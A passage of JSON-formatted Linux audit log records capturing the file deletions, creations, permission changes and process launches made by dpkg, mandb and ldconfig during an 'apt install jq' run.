"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.437:798",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f99b470",
"0x7ffc63757b30",
"0xffffffffffffff78",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/local/share/man"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/oldlocal/7654",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.441:799",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277189,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0010",
"inode": 277189,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.445:800",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0011",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.449:801",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 3,
"ppid": 7652,
"pid": 7747,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "libc-bin.postin",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x56016b437fa0",
"0x56016b42c940",
"0x56016b5e8760",
"0x56016b428010"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/libc-bin.postinst",
"triggered",
"ldconfig"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/info/libc-bin.postinst",
"inode": 268314,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/libc-bin.postinst",
"triggered",
"ldconfig"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
],
"launch_time": 1632470478.033,
"ppid": 7575
}
}
{
"ID": "1632470478.449:802",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 3,
"ppid": 7747,
"pid": 7748,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "ldconfig",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x5567b8439028",
"0x5567b8438e30",
"0x5567b8438f38",
"0x7fa761336850"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/bin/sh",
"/usr/sbin/ldconfig"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/ldconfig",
"inode": 794139,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"/usr/sbin/ldconfig"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/libc-bin.postinst",
"triggered",
"ldconfig"
],
"launch_time": 1632470478.449,
"ppid": 7652
}
}
{
"ID": "1632470478.449:803",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7747,
"pid": 7748,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "ldconfig.real",
"exe": "/usr/sbin/ldconfig.real",
"key": "rootcmd",
"ARGV": [
"0x5639ddef4b88",
"0x5639ddef4bc8",
"0x5639de386828",
"0x5639ddeebda2"
]
},
"EXECVE": {
"argc": 1,
"ARGV": [
"/sbin/ldconfig.real"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/sbin/ldconfig.real",
"inode": 794140,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"/usr/sbin/ldconfig"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/libc-bin.postinst",
"triggered",
"ldconfig"
],
"launch_time": 1632470478.449,
"ppid": 7652
}
}
{
"ID": "1632470478.477:804",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7747,
"pid": 7748,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "ldconfig.real",
"exe": "/usr/sbin/ldconfig.real",
"key": "perm_mod",
"ARGV": [
"0x5555563b8d00",
"0x1a4",
"0x4fc4",
"0x180"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/etc/ld.so.cache~",
"inode": 133292,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"/usr/sbin/ldconfig"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/libc-bin.postinst",
"triggered",
"ldconfig"
],
"launch_time": 1632470478.449,
"ppid": 7652
}
}
{
"ID": "1632470478.489:805",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 5,
"ppid": 7747,
"pid": 7748,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "ldconfig.real",
"exe": "/usr/sbin/ldconfig.real",
"key": "delete",
"ARGV": [
"0x5555563b8d00",
"0x7fff09c36000",
"0x4fc4",
"0x180"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/etc/",
"inode": 131073,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/etc/",
"inode": 131073,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/etc/ld.so.cache~",
"inode": 133292,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/etc/ld.so.cache",
"inode": 133405,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 4,
"name": "/etc/ld.so.cache",
"inode": 133292,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"/usr/sbin/ldconfig"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/libc-bin.postinst",
"triggered",
"ldconfig"
],
"launch_time": 1632470478.449,
"ppid": 7652
}
}
{
"ID": "1632470478.493:806",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 5,
"ppid": 7747,
"pid": 7748,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "ldconfig.real",
"exe": "/usr/sbin/ldconfig.real",
"key": "delete",
"ARGV": [
"0x5555563b9c10",
"0x7feebcdcf273",
"0x5948",
"0x180"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/ldconfig/",
"inode": 138203,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/ldconfig/",
"inode": 138203,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/cache/ldconfig/aux-cache~",
"inode": 133341,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/cache/ldconfig/aux-cache",
"inode": 133354,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 4,
"name": "/var/cache/ldconfig/aux-cache",
"inode": 133341,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"/usr/sbin/ldconfig"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/libc-bin.postinst",
"triggered",
"ldconfig"
],
"launch_time": 1632470478.449,
"ppid": 7652
}
}
{
"ID": "1632470478.493:807",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277194,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0012",
"inode": 277194,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.497:808",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x9",
"0x1a4",
"0x0",
"0x1b6"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 14215,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.509:809",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b5e8060",
"0x56016b5e86f0",
"0x0",
"0x5601697b697d"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/status-old",
"inode": 14163,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.509:810",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 5,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b5e8520",
"0x56016b5ea1c0",
"0x56016b437990",
"0x5601697b697d"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/status-new",
"inode": 14215,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/status",
"inode": 14216,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 4,
"name": "/var/lib/dpkg/status",
"inode": 14215,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:811",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0000",
"inode": 276936,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:812",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0001",
"inode": 276984,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:813",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0002",
"inode": 276990,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:814",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
